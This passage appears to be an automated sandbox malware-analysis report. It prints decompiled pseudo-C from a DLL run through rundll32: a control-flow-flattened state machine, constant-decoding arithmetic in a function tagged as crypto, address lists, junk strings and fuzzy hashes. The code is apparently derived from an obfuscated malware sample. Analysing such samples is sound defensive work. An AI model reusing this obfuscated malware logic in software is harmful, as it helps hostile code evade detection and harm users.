							__eflags = _t1290 - 0x217a1233;
							if(__eflags == 0) {
								_push(_t1290);
								E1000607F(_t1290, __eflags, _t1290, _v384, _v588);
								_t1430 = _t1430 + 0x10;
								goto L39;
							}
							__eflags = _t1290 - 0x2342e4cf;
							if(__eflags != 0) {
								goto L104;
							}
							_t1166 = E1001992F(__eflags);
							__eflags = _t1166;
							if(_t1166 == 0) {
								goto L109;
							}
							_t1290 = 0x1fcd18b3;
							while(1) {
								L1:
								_t1166 = 0x1347b7a7;
								goto L2;
							}
						}
						if(__eflags == 0) {
							E1001B01E();
							_t1290 = 0x124b7e54;
							while(1) {
								L1:
								_t1166 = 0x1347b7a7;
								goto L2;
							}
						}
						__eflags = _t1290 - 0x190c5646;
						if(_t1290 == 0x190c5646) {
							E1000704B();
							_t1290 = 0xaff942a;
							while(1) {
								L1:
								_t1166 = 0x1347b7a7;
								goto L2;
							}
						}
						__eflags = _t1290 - 0x1bfbd9ca;
						if(_t1290 == 0x1bfbd9ca) {
							_push(_v552);
							_push(_v212);
							_t1299 = _v288;
							_push( &_v140);
							_push( &_v132);
							_t1265 = E10019DC0(_t1299, _v152);
							_t1431 = _t1430 + 0x10;
							__eflags = _t1265;
							if(__eflags == 0) {
								E10016536();
								_t1424 = 0x33503405;
								_push(_t1299);
								_t1272 = E1000607F(_t1299, __eflags, _t1299, _v416, _v424);
								_t1430 = _t1431 + 0x10;
								_t1397 = _t1272;
								goto L44;
							}
							_t1424 = 0x33503405;
							_push(_t1299);
							_t1277 = E1000607F(_t1299, __eflags, _t1299, _v544, _v440);
							_t1430 = _t1431 + 0x10;
							_t1397 = _t1277;
							_t1290 = 0x679c612;
							while(1) {
								L1:
								_t1166 = 0x1347b7a7;
								goto L2;
							}
						}
						__eflags = _t1290 - 0x1c2cf691;
						if(_t1290 == 0x1c2cf691) {
							_t1278 = E10014E4B( &_v68, _v160, _v228, _v472);
							_t1430 = _t1430 + 0xc;
							__eflags = _t1278;
							if(_t1278 == 0) {
								L64:
								_t1290 = 0x20b99456;
								while(1) {
									L1:
									_t1166 = 0x1347b7a7;
									goto L2;
								}
							}
							_v112 =  &_v68;
							_v108 = E1000D013( &_v68, _v172, _v220);
							_t1290 = 0xa42f83d;
							goto L1;
						}
						__eflags = _t1290 - 0x1d3feeae;
						if(__eflags != 0) {
							goto L104;
						}
						_push(_t1290);
						_push(_t1290);
						_t1284 = E1001E0D0(_t1397, __eflags);
						__eflags = _t1284;
						if(_t1284 == 0) {
							_t1290 = _t1424;
							goto L103;
						}
						goto L64;
						L104:
						__eflags = _t1290 - 0x24c87c39;
					} while (_t1290 != 0x24c87c39);
					goto L109;
				}
			}

0x1000dc35
0x1000dc3b
0x1000dc48
0x1000dc4f
0x1000dc54
0x1000dc5f
0x1000dc6a
0x1000dc75
0x1000dc80
0x1000dc8b
0x1000dc9d
0x1000dca2
0x1000dca8
0x1000dcad
0x1000dcb5
0x1000dcbd
0x1000dcc8
0x1000dcd3
0x1000dcde
0x1000dce9
0x1000dcf4
0x1000dcff
0x1000dd0a
0x1000dd12
0x1000dd1a
0x1000dd1f
0x1000dd27
0x1000dd2f
0x1000dd3a
0x1000dd42
0x1000dd4d
0x1000dd58
0x1000dd6a
0x1000dd6d
0x1000dd74
0x1000dd7f
0x1000dd8a
0x1000dd9a
0x1000dda1
0x1000ddac
0x1000ddb7
0x1000ddc2
0x1000ddcd
0x1000ddd8
0x1000dde3
0x1000ddee
0x1000ddf9
0x1000de04
0x1000de0c
0x1000de17
0x1000de22
0x1000de2d
0x1000de34
0x1000de3c
0x1000de47
0x1000de52
0x1000de5d
0x1000de68
0x1000de70
0x1000de7d
0x1000de81
0x1000de89
0x1000de94
0x1000de9c
0x1000dea7
0x1000deb2
0x1000debd
0x1000dec8
0x1000ded3
0x1000dee0
0x1000deeb
0x1000def6
0x1000defe
0x1000df09
0x1000df11
0x1000df19
0x1000df27
0x1000df2c
0x1000df32
0x1000df3a
0x1000df45
0x1000df50
0x1000df62
0x1000df67
0x1000df70
0x1000df7b
0x1000df86
0x1000df8e
0x1000df99
0x1000dfa4
0x1000dfaf
0x1000dfba
0x1000dfc5
0x1000dfd0
0x1000dfdb
0x1000dfe6
0x1000dff1
0x1000dffc
0x1000e007
0x1000e00f
0x1000e01a
0x1000e025
0x1000e035
0x1000e038
0x1000e03b
0x1000e042
0x1000e04d
0x1000e063
0x1000e06a
0x1000e075
0x1000e07d
0x1000e085
0x1000e08a
0x1000e092
0x1000e09a
0x1000e0a2
0x1000e0a7
0x1000e0ac
0x1000e0b1
0x1000e0b9
0x1000e0c1
0x1000e0c6
0x1000e0cb
0x1000e0d3
0x1000e0db
0x1000e0e3
0x1000e0f3
0x1000e0fb
0x1000e0fe
0x1000e104
0x1000e10c
0x1000e117
0x1000e11f
0x1000e12a
0x1000e135
0x1000e13d
0x1000e148
0x1000e150
0x1000e15e
0x1000e163
0x1000e16e
0x1000e171
0x1000e175
0x1000e17d
0x1000e188
0x1000e193
0x1000e19e
0x1000e1a9
0x1000e1b4
0x1000e1bc
0x1000e1c4
0x1000e1cf
0x1000e1da
0x1000e1e5
0x1000e1f0
0x1000e1fb
0x1000e211
0x1000e218
0x1000e223
0x1000e22a
0x1000e235
0x1000e240
0x1000e24b
0x1000e256
0x1000e261
0x1000e274
0x1000e275
0x1000e27c
0x1000e284
0x1000e28f
0x1000e29a
0x1000e2ae
0x1000e2bd
0x1000e2c4
0x1000e2cf
0x1000e2da
0x1000e2e2
0x1000e2ed
0x1000e2f8
0x1000e303
0x1000e30e
0x1000e319
0x1000e324
0x1000e32f
0x1000e337
0x1000e33f
0x1000e349
0x1000e34d
0x1000e355
0x1000e35d
0x1000e365
0x1000e369
0x1000e371
0x1000e379
0x1000e38f
0x1000e394
0x1000e39b
0x1000e3a6
0x1000e3b1
0x1000e3c1
0x1000e3c7
0x1000e3cf
0x1000e3d7
0x1000e3df
0x1000e3ea
0x1000e3f5
0x1000e400
0x1000e412
0x1000e417
0x1000e420
0x1000e42b
0x1000e43e
0x1000e441
0x1000e442
0x1000e449
0x1000e454
0x1000e45c
0x1000e467
0x1000e472
0x1000e47d
0x1000e488
0x1000e493
0x1000e49e
0x1000e4a9
0x1000e4b4
0x1000e4bf
0x1000e4c7
0x1000e4d2
0x1000e4dd
0x1000e4e8
0x1000e4f0
0x1000e4fb
0x1000e503
0x1000e50b
0x1000e510
0x1000e518
0x1000e520
0x1000e52b
0x1000e536
0x1000e541
0x1000e54c
0x1000e557
0x1000e562
0x1000e56d
0x1000e578
0x1000e58b
0x1000e592
0x1000e59d
0x1000e5b3
0x1000e5c2
0x1000e5c9
0x1000e5d4
0x1000e5e8
0x1000e5f1
0x1000e5fc
0x1000e604
0x1000e60f
0x1000e617
0x1000e61f
0x1000e627
0x1000e62f
0x1000e637
0x1000e64b
0x1000e650
0x1000e662
0x1000e669
0x1000e674
0x1000e688
0x1000e68d
0x1000e694
0x1000e69f
0x1000e6b4
0x1000e6b7
0x1000e6b8
0x1000e6bf
0x1000e6ca
0x1000e6d5
0x1000e6e0
0x1000e6eb
0x1000e701
0x1000e708
0x1000e713
0x1000e71b
0x1000e723
0x1000e730
0x1000e734
0x1000e73c
0x1000e747
0x1000e752
0x1000e762
0x1000e769
0x1000e774
0x1000e77f
0x1000e787
0x1000e792
0x1000e79d
0x1000e7a8
0x1000e7b3
0x1000e7be
0x1000e7c9
0x1000e7da
0x1000e7e1
0x1000e7ec
0x1000e7ff
0x1000e806
0x1000e811
0x1000e824
0x1000e82b
0x1000e838
0x1000e84c
0x1000e851
0x1000e85a
0x1000e861
0x1000e869
0x1000e874
0x1000e886
0x1000e88b
0x1000e894
0x1000e89f
0x1000e8aa
0x1000e8b5
0x1000e8c0
0x1000e8cb
0x1000e8d6
0x1000e8de
0x1000e8e6
0x1000e8f1
0x1000e904
0x1000e905
0x1000e914
0x1000e91b
0x1000e926
0x1000e931
0x1000e939
0x1000e941
0x1000e94c
0x1000e957
0x1000e95f
0x1000e96a
0x1000e975
0x1000e97d
0x1000e985
0x1000e98a
0x1000e992
0x1000e99a
0x1000e9a5
0x1000e9ad
0x1000e9b8
0x1000e9c0
0x1000e9c8
0x1000e9d2
0x1000e9d6
0x1000e9de
0x1000e9e9
0x1000e9f0
0x1000e9fb
0x1000ea06
0x1000ea0e
0x1000ea16
0x1000ea24
0x1000ea28
0x1000ea30
0x1000ea3b
0x1000ea4e
0x1000ea55
0x1000ea5d
0x1000ea68
0x1000ea73
0x1000ea7e
0x1000ea89
0x1000ea94
0x1000ea9f
0x1000eaaa
0x1000eab7
0x1000eabf
0x1000eace
0x1000ead1
0x1000ead5
0x1000eada
0x1000eae2
0x1000eaed
0x1000eaf5
0x1000eb07
0x1000eb0e
0x1000eb19
0x1000eb24
0x1000eb2f
0x1000eb3a
0x1000eb45
0x1000eb4c
0x1000eb57
0x1000eb62
0x1000eb6d
0x1000eb78
0x1000eb83
0x1000eb8b
0x1000eb90
0x1000eb98
0x1000eba0
0x1000eba8
0x1000ebb0
0x1000ebbd
0x1000ebbe
0x1000ebc2
0x1000ebca
0x1000ebd2
0x1000ebda
0x1000ebe2
0x1000ebea
0x1000ebf2
0x1000ebfa
0x1000ec05
0x1000ec10
0x1000ec1b
0x1000ec26
0x1000ec2e
0x1000ec33
0x1000ec41
0x1000ec45
0x1000ec4d
0x1000ec58
0x1000ec60
0x1000ec6b
0x1000ec76
0x1000ec7e
0x1000ec89
0x1000ec94
0x1000ec9f
0x1000ecaa
0x1000ecb5
0x1000ecc0
0x1000ecc8
0x1000ecd3
0x1000ecde
0x1000ece9
0x1000ecf4
0x1000ecff
0x1000ed0a
0x1000ed15
0x1000ed1d
0x1000ed28
0x1000ed30
0x1000ed3d
0x1000ed43
0x1000ed50
0x1000ed58
0x1000ed6c
0x1000ed78
0x1000ed7f
0x1000ed8a
0x1000ed95
0x1000eda0
0x1000eda8
0x1000edbd
0x1000edbe
0x1000edc5
0x1000edd0
0x1000edd8
0x1000ede0
0x1000ede8
0x1000edf0
0x1000edf8
0x1000ee15
0x1000ee1c
0x1000ee27
0x1000ee3a
0x1000ee41
0x1000ee4c
0x1000ee57
0x1000ee5f
0x1000ee6a
0x1000ee72
0x1000ee82
0x1000ee86
0x1000ee8e
0x1000ee96
0x1000eea1
0x1000eeac
0x1000eeb7
0x1000eec2
0x1000eecd
0x1000eed8
0x1000eee0
0x1000eeeb
0x1000eef3
0x1000eefb
0x1000ef00
0x1000ef05
0x1000ef0d
0x1000ef18
0x1000ef23
0x1000ef2b
0x1000ef36
0x1000ef41
0x1000ef49
0x1000ef51
0x1000ef5c
0x1000ef5c
0x1000ef5c
0x1000ef61
0x1000ef61
0x1000ef61
0x1000ef61
0x1000ef63
0x00000000
0x00000000
0x1000ef69
0x1000f34e
0x1000f361
0x1000f368
0x1000f370
0x1000ef5c
0x1000ef5c
0x1000ef5c
0x00000000
0x1000ef5c
0x1000ef5c
0x1000ef6f
0x1000ef75
0x1000f18e
0x1000f190
0x1000f27e
0x1000f284
0x1000f32c
0x1000f331
0x1000f333
0x1000f80b
0x1000f812
0x1000f812
0x1000f339
0x1000ef5c
0x1000ef5c
0x1000ef5c
0x00000000
0x1000ef5c
0x1000ef5c
0x1000f28a
0x1000f290
0x1000f30e
0x1000f314
0x1000ef5c
0x1000ef5c
0x1000ef5c
0x00000000
0x1000ef5c
0x1000ef5c
0x1000f292
0x1000f298
0x1000f2ea
0x1000f2ef
0x1000ef5c
0x1000ef5c
0x1000ef5c
0x00000000
0x1000ef5c
0x1000ef5c
0x1000f29a
0x1000f2a0
0x00000000
0x00000000
0x1000f2c3
0x1000f2cb
0x1000f2cc
0x1000f2d4
0x1000ef5c
0x1000ef5c
0x1000ef5c
0x00000000
0x1000ef5c
0x1000ef5c
0x1000f196
0x1000f7f1
0x00000000
0x1000f7f1
0x1000f19c
0x1000f1a2
0x1000f26c
0x1000f271
0x1000f274
0x1000f274
0x1000ef5c
0x1000ef5c
0x1000ef5c
0x00000000
0x1000ef5c
0x1000ef5c
0x1000f1a8
0x1000f1ae
0x1000f232
0x1000f239
0x1000f241
0x1000ef5c
0x1000ef5c
0x1000ef5c
0x00000000
0x1000ef5c
0x1000ef5c
0x1000f1b0
0x1000f1b6
0x1000f1fd
0x1000f202
0x1000f204
0x00000000
0x00000000
0x1000f215
0x1000f21a
0x1000ef5c
0x1000ef5c
0x1000ef5c
0x00000000
0x1000ef5c
0x1000ef5c
0x1000f1b8
0x1000f1be
0x00000000
0x00000000
0x1000f1e4
0x1000f1e9
0x1000f1ec
0x1000f1ec
0x1000ef5c
0x1000ef5c
0x1000ef5c
0x00000000
0x1000ef5c
0x1000ef5c
0x1000ef7b
0x1000f184
0x00000000
0x1000f184
0x1000ef81
0x1000ef87
0x1000f0f6
0x1000f0fc
0x1000f173
0x1000f17a
0x1000ef5c
0x1000ef5c
0x1000ef5c
0x00000000
0x1000ef5c
0x1000ef5c
0x1000f0fe
0x1000f104
0x1000f151
0x1000f156
0x1000ef5c
0x1000ef5c
0x1000ef5c
0x00000000
0x1000ef5c
0x1000ef5c
0x1000f106
0x1000f10c
0x1000f13e
0x1000f143
0x1000ef5c
0x1000ef5c
0x1000ef5c
0x00000000
0x1000ef5c
0x1000ef5c
0x1000f10e
0x1000f114
0x00000000
0x00000000
0x1000f126
0x1000f12d
0x1000ef5c
0x1000ef5c
0x1000ef5c
0x00000000
0x1000ef5c
0x1000ef5c
0x1000ef8d
0x1000f0ae
0x1000f0b3
0x1000f0b6
0x1000f0b8
0x1000f677
0x1000f677
0x1000ef5c
0x1000ef5c
0x1000ef5c
0x00000000
0x1000ef5c
0x1000ef5c
0x1000f0c9
0x1000f0ce
0x1000f0d6
0x1000f0db
0x1000ef5c
0x1000ef5c
0x1000ef5c
0x00000000
0x1000ef5c
0x1000ef5c
0x1000f0e1
0x1000f0e9
0x1000f0ee
0x00000000
0x1000f0ee
0x1000ef99
0x1000f073
0x1000f078
0x1000ef5c
0x1000ef5c
0x1000ef5c
0x00000000
0x1000ef5c
0x1000ef5c
0x1000efa5
0x1000f057
0x1000f05e
0x1000ef5c
0x1000ef5c
0x1000ef5c
0x00000000
0x1000ef5c
0x1000ef5c
0x1000efb1
0x1000f7e3
0x00000000
0x1000f7e3
0x1000efbd
0x1000f03d
0x1000f044
0x1000f046
0x1000efff
0x1000efff
0x1000ef5c
0x1000ef5c
0x1000ef5c
0x00000000
0x1000ef5c
0x1000ef5c
0x1000efc5
0x00000000
0x00000000
0x1000efe0
0x1000f015
0x1000f01c
0x1000f024
0x1000ef5c
0x1000ef5c
0x1000ef5c
0x00000000
0x1000ef5c
0x1000ef5c
0x1000eff0
0x1000eff7
0x1000eff9
0x00000000
0x1000eff9
0x1000f37b
0x1000f381
0x1000f5e9
0x1000f5ef
0x1000f6ae
0x1000f6b4
0x1000f7b5
0x1000f7ba
0x1000f7bd
0x1000f7c2
0x1000f7c2
0x00000000
0x1000f7c2
0x1000f6ba
0x1000f6c0
0x1000f72d
0x1000f73b
0x1000f758
0x1000f780
0x1000f785
0x1000f788
0x1000ef5c
0x1000ef5c
0x1000ef5c
0x00000000
0x1000ef5c
0x1000ef5c
0x1000f6c2
0x1000f6c4
0x1000f70d
0x1000f712
0x1000f715
0x1000ef5c
0x1000ef5c
0x1000ef5c
0x00000000
0x1000ef5c
0x1000ef5c
0x1000f6c6
0x1000f6cc
0x00000000
0x00000000
0x1000f6da
0x1000f6df
0x1000ef5c
0x1000ef5c
0x1000ef5c
0x00000000
0x1000ef5c
0x1000ef5c
0x1000f5f5
0x1000f69d
0x1000f6a2
0x1000ef5c
0x1000ef5c
0x1000ef5c
0x00000000
0x1000ef5c
0x1000ef5c
0x1000f5fb
0x1000f601
0x1000f688
0x1000f68a
0x1000ef5c
0x1000ef5c
0x1000ef5c
0x00000000
0x1000ef5c
0x1000ef5c
0x1000f603
0x1000f609
0x1000f667
0x1000f66d
0x1000f66f
0x1000f66f
0x00000000
0x1000f66f
0x1000f60b
0x1000f611
0x1000f643
0x1000f648
0x1000f64b
0x1000ef5c
0x1000ef5c
0x1000ef5c
0x00000000
0x1000ef5c
0x1000ef5c
0x1000f613
0x1000f619
0x00000000
0x00000000
0x1000f61f
0x00000000
0x1000f61f
0x1000f387
0x1000f5df
0x00000000
0x1000f5df
0x1000f38d
0x1000f393
0x1000f547
0x1000f54d
0x1000f806
0x00000000
0x1000f806
0x1000f553
0x1000f559
0x1000f5d0
0x1000f5d5
0x1000ef5c
0x1000ef5c
0x1000ef5c
0x00000000
0x1000ef5c
0x1000ef5c
0x1000f55b
0x1000f561
0x1000f5ac
0x1000f5b9
0x1000f5be
0x00000000
0x1000f5c1
0x1000f563
0x1000f569
0x00000000
0x00000000
0x1000f57d
0x1000f582
0x1000f584
0x00000000
0x00000000
0x1000f58a
0x1000ef5c
0x1000ef5c
0x1000ef5c
0x00000000
0x1000ef5c
0x1000ef5c
0x1000f399
0x1000f538
0x1000f53d
0x1000ef5c
0x1000ef5c
0x1000ef5c
0x00000000
0x1000ef5c
0x1000ef5c
0x1000f39f
0x1000f3a5
0x1000f51e
0x1000f523
0x1000ef5c
0x1000ef5c
0x1000ef5c
0x00000000
0x1000ef5c
0x1000ef5c
0x1000f3ab
0x1000f3b1
0x1000f45a
0x1000f465
0x1000f473
0x1000f47a
0x1000f482
0x1000f483
0x1000f488
0x1000f48b
0x1000f48d
0x1000f4d5
0x1000f4e1
0x1000f4f8
0x1000f508
0x1000f50d
0x1000f510
0x00000000
0x1000f510
0x1000f496
0x1000f4ad
0x1000f4ba
0x1000f4bf
0x1000f4c2
0x1000f4c4
0x1000ef5c
0x1000ef5c
0x1000ef5c
0x00000000
0x1000ef5c
0x1000ef5c
0x1000f3b7
0x1000f3bd
0x1000f419
0x1000f41e
0x1000f421
0x1000f423
0x1000f3ec
0x1000f3ec
0x1000ef5c
0x1000ef5c
0x1000ef5c
0x00000000
0x1000ef5c
0x1000ef5c
0x1000f43c
0x1000f449
0x1000f450
0x00000000
0x1000f450
0x1000f3bf
0x1000f3c5
0x00000000
0x00000000
0x1000f3df
0x1000f3e0
0x1000f3e1
0x1000f3e8
0x1000f3ea
0x1000f3f6
0x00000000
0x1000f3f6
0x00000000
0x1000f7c7
0x1000f7c7
0x1000f7c7
0x00000000
0x1000f7d3

Strings

(1, xrefs: 1000E13D
T5, xrefs: 1000E520
v^, xrefs: 1000E9DE
~|, xrefs: 1000E894
0G, xrefs: 1000EDF8
#x, xrefs: 1000E303
Ue., xrefs: 1000E806
g@, xrefs: 1000E669
]1, xrefs: 1000E2E2
2N, xrefs: 1000ED7F
EA, xrefs: 1000DE9C
y?, xrefs: 1000E104
X, xrefs: 1000E29A
lK, xrefs: 1000ED95
5h, xrefs: 1000EEEB
N, xrefs: 1000E7BE
6N, xrefs: 1000ED1D
o, xrefs: 1000DE22
j:, xrefs: 1000EF0D
}o, xrefs: 1000E8F1
Lw, xrefs: 1000E261
4, xrefs: 1000DC5F
}L, xrefs: 1000DD0A
q2, xrefs: 1000EE5F
s4, xrefs: 1000DDA1
_, xrefs: 1000E941
, xrefs: 1000EA89
ly, xrefs: 1000E01A
B, xrefs: 1000DF50
mU, xrefs: 1000E811
{, xrefs: 1000DDF9
;l, xrefs: 1000E3DF
@P, xrefs: 1000E708
b), xrefs: 1000E60F

Memory Dump Source

Source File: 00000006.00000002.2173093562.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2173106861.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2173110460.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: $#x$(1$0G$2N$5h$6N$;l$@P$B$EA$Lw$N$T5$Ue.$X$]1$b)$g@$j:$lK$ly$mU$o$q2$s4$v^$y?${$}L$}o$~|$4$_
API String ID: 0-2583851105
Opcode ID: abf9190a5ddaddb15da951abeef27d0c74c7bb0a7871e85bd9f0843ae82e2e6e
Instruction ID: 09289fdc9c065f3b08f6dc9904ee957473f24b9c187b49a6f0bb080dac621220
Opcode Fuzzy Hash: abf9190a5ddaddb15da951abeef27d0c74c7bb0a7871e85bd9f0843ae82e2e6e
Instruction Fuzzy Hash: DED202715093818BE3B8CF25C58ABDFBBE1FB84344F10891DE59A86260DBB59949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 1000ADCE, Relevance: 31.9, Strings: 25, Instructions: 696
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E1000ADCE(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr* _a24, intOrPtr _a28, intOrPtr _a32, signed int _a36, intOrPtr _a40) {
				intOrPtr* _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr* _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				unsigned int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				intOrPtr* _v340;
				intOrPtr* _v344;
				void* _t776;
				intOrPtr* _t779;
				intOrPtr* _t782;
				intOrPtr* _t794;
				intOrPtr _t799;
				intOrPtr _t800;
				void* _t806;
				void* _t808;
				intOrPtr _t810;
				intOrPtr* _t811;
				intOrPtr* _t815;
				signed int _t824;
				void* _t833;
				signed int _t834;
				void* _t876;
				intOrPtr _t879;
				signed int _t892;
				signed int _t893;
				signed int _t894;
				signed int _t895;
				signed int _t896;
				signed int _t897;
				signed int _t898;
				signed int _t899;
				signed int _t900;
				signed int _t901;
				signed int _t902;
				signed int _t903;
				signed int _t904;
				signed int _t905;
				signed int _t906;
				signed int _t907;
				signed int _t908;
				signed int _t909;
				signed int _t911;
				intOrPtr* _t917;
				void* _t919;
				void* _t921;
				void* _t923;

				_t815 = _a24;
				_push(_a40);
				_push(_a36 & 0x0000ffff);
				_push(_a32);
				_push(_a28);
				_push(_t815);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E100056B2(_a36 & 0x0000ffff);
				_v16 = 0x698fe5;
				_v4 = 0;
				_t817 = 0;
				_v20 = 0;
				_t917 = 0;
				_v12 = 0x6421c2;
				_t919 =  &_v344 + 0x30;
				_v8 = 0x4b39f;
				_v116 = 0xe145;
				_t911 = 0x2a775466;
				_v32 = 0;
				_t892 = 0x2c;
				_v344 = 0;
				_v116 = _v116 * 0x68;
				_v116 = _v116 ^ 0x005b8408;
				_v252 = 0x1a30;
				_v252 = _v252 | 0xfbfb3abf;
				_v252 = _v252 ^ 0xfbfb3aac;
				_v308 = 0xd892;
				_v308 = _v308 | 0x24cee9b5;
				_v308 = _v308 << 0xe;
				_v308 = _v308 ^ 0x3a963db2;
				_v308 = _v308 ^ 0x84fbfd7a;
				_v144 = 0xe41e;
				_v144 = _v144 ^ 0xfb5a10bc;
				_v144 = _v144 >> 2;
				_v144 = _v144 ^ 0x3ed63d28;
				_v292 = 0xf2f6;
				_v292 = _v292 + 0xffff8fc8;
				_v292 = _v292 / _t892;
				_v292 = _v292 + 0x4f67;
				_v292 = _v292 ^ 0x0000125f;
				_v44 = 0x5769;
				_v44 = _v44 + 0x7821;
				_v44 = _v44 ^ 0x0040cf8a;
				_v208 = 0xa2da;
				_v208 = _v208 + 0xffffda26;
				_v208 = _v208 | 0x6bc8fc84;
				_v208 = _v208 ^ 0x6bccfd84;
				_v100 = 0x8619;
				_t893 = 0x6e;
				_v100 = _v100 / _t893;
				_v100 = _v100 ^ 0x04000138;
				_v236 = 0x85ca;
				_v236 = _v236 + 0xf775;
				_v236 = _v236 >> 0xc;
				_v236 = _v236 | 0xc3010237;
				_v236 = _v236 ^ 0xc3090237;
				_v60 = 0x5f94;
				_v60 = _v60 + 0xffff918e;
				_v60 = _v60 ^ 0xfffff322;
				_v300 = 0xef4d;
				_v300 = _v300 | 0xf95e9216;
				_t894 = 0x1d;
				_v300 = _v300 * 0x78;
				_v300 = _v300 + 0xffffa6e4;
				_v300 = _v300 ^ 0xe4875a6c;
				_v176 = 0xcd87;
				_v176 = _v176 + 0xffff9544;
				_v176 = _v176 / _t894;
				_v176 = _v176 ^ 0x80000368;
				_v248 = 0xa869;
				_v248 = _v248 + 0xffff8a84;
				_v248 = _v248 | 0x3280cd8c;
				_t895 = 0x2c;
				_v248 = _v248 * 0x62;
				_v248 = _v248 ^ 0x5561f8ba;
				_v112 = 0xf823;
				_v112 = _v112 ^ 0xdc5ee9a3;
				_v112 = _v112 ^ 0xdc5e1183;
				_v284 = 0xd3bc;
				_v284 = _v284 + 0xffffd98b;
				_v284 = _v284 + 0x486f;
				_v284 = _v284 | 0x91fa5adb;
				_v284 = _v284 ^ 0x91fa81ff;
				_v220 = 0x23c4;
				_v220 = _v220 + 0x24bf;
				_v220 = _v220 >> 0xe;
				_v220 = _v220 ^ 0x0000397d;
				_v324 = 0x9c0e;
				_v324 = _v324 / _t895;
				_v324 = _v324 ^ 0x81dfe71b;
				_v324 = _v324 | 0x74c77561;
				_v324 = _v324 ^ 0xf5dfe4bc;
				_v244 = 0x9f78;
				_t896 = 0x30;
				_v244 = _v244 / _t896;
				_v244 = _v244 + 0xbc13;
				_v244 = _v244 + 0xffff658a;
				_v244 = _v244 ^ 0x00005446;
				_v276 = 0xb1b5;
				_v276 = _v276 >> 6;
				_t897 = 0x51;
				_v276 = _v276 * 0x2c;
				_v276 = _v276 ^ 0xbae7ac45;
				_v276 = _v276 ^ 0xbae7c01a;
				_v124 = 0x48e3;
				_v124 = _v124 / _t897;
				_v124 = _v124 ^ 0x0000464a;
				_v40 = 0xb973;
				_v40 = _v40 + 0x5be4;
				_v40 = _v40 ^ 0x0001169b;
				_v160 = 0x90d2;
				_v160 = _v160 ^ 0xc876beee;
				_v160 = _v160 ^ 0xab2ec0d4;
				_v160 = _v160 ^ 0x63589e4c;
				_v216 = 0xebb5;
				_v216 = _v216 + 0x1b6c;
				_v216 = _v216 + 0x5cd2;
				_v216 = _v216 ^ 0x000123a2;
				_v136 = 0xd2d;
				_v136 = _v136 ^ 0xde320a5a;
				_v136 = _v136 ^ 0xde322c98;
				_v316 = 0x9c31;
				_v316 = _v316 + 0x87ce;
				_v316 = _v316 >> 0xf;
				_v316 = _v316 << 0xf;
				_v316 = _v316 ^ 0x000161f3;
				_v68 = 0xaa4;
				_v68 = _v68 | 0x379a6afa;
				_v68 = _v68 ^ 0x379a4249;
				_v72 = 0x66fd;
				_v72 = _v72 ^ 0x1bf5aa39;
				_v72 = _v72 ^ 0x1bf5cfe8;
				_v240 = 0x10ca;
				_v240 = _v240 >> 2;
				_v240 = _v240 + 0x9cc9;
				_v240 = _v240 ^ 0x8ecb9aa9;
				_v240 = _v240 ^ 0x8ecb190c;
				_v80 = 0x1ce5;
				_v80 = _v80 + 0x5a3a;
				_v80 = _v80 ^ 0x000031ae;
				_v180 = 0x6dd0;
				_v180 = _v180 | 0x96bfe9d3;
				_v180 = _v180 + 0x5bad;
				_v180 = _v180 ^ 0x96c064a5;
				_v56 = 0x4ba5;
				_v56 = _v56 >> 9;
				_v56 = _v56 ^ 0x000020d5;
				_v164 = 0xc88c;
				_v164 = _v164 >> 0xf;
				_v164 = _v164 + 0xffffb953;
				_v164 = _v164 ^ 0xffffcdf3;
				_v172 = 0xd4f7;
				_v172 = _v172 + 0x6d56;
				_t898 = 0x71;
				_v172 = _v172 / _t898;
				_v172 = _v172 ^ 0x00007fec;
				_v64 = 0x2274;
				_v64 = _v64 << 5;
				_v64 = _v64 ^ 0x00042253;
				_v280 = 0xbd0e;
				_v280 = _v280 ^ 0x300005f5;
				_v280 = _v280 ^ 0x6939e5f4;
				_t899 = 0x4e;
				_v280 = _v280 * 0x37;
				_v280 = _v280 ^ 0x2b52c5dd;
				_v104 = 0xaf51;
				_v104 = _v104 << 7;
				_v104 = _v104 ^ 0x0057daf8;
				_v120 = 0x5a17;
				_v120 = _v120 << 7;
				_v120 = _v120 ^ 0x002d33fc;
				_v288 = 0x6e7b;
				_v288 = _v288 + 0xa186;
				_v288 = _v288 + 0xffffb015;
				_v288 = _v288 >> 2;
				_v288 = _v288 ^ 0x00005323;
				_v296 = 0x1ff6;
				_v296 = _v296 * 0x6d;
				_t900 = 0x76;
				_v296 = _v296 / _t899;
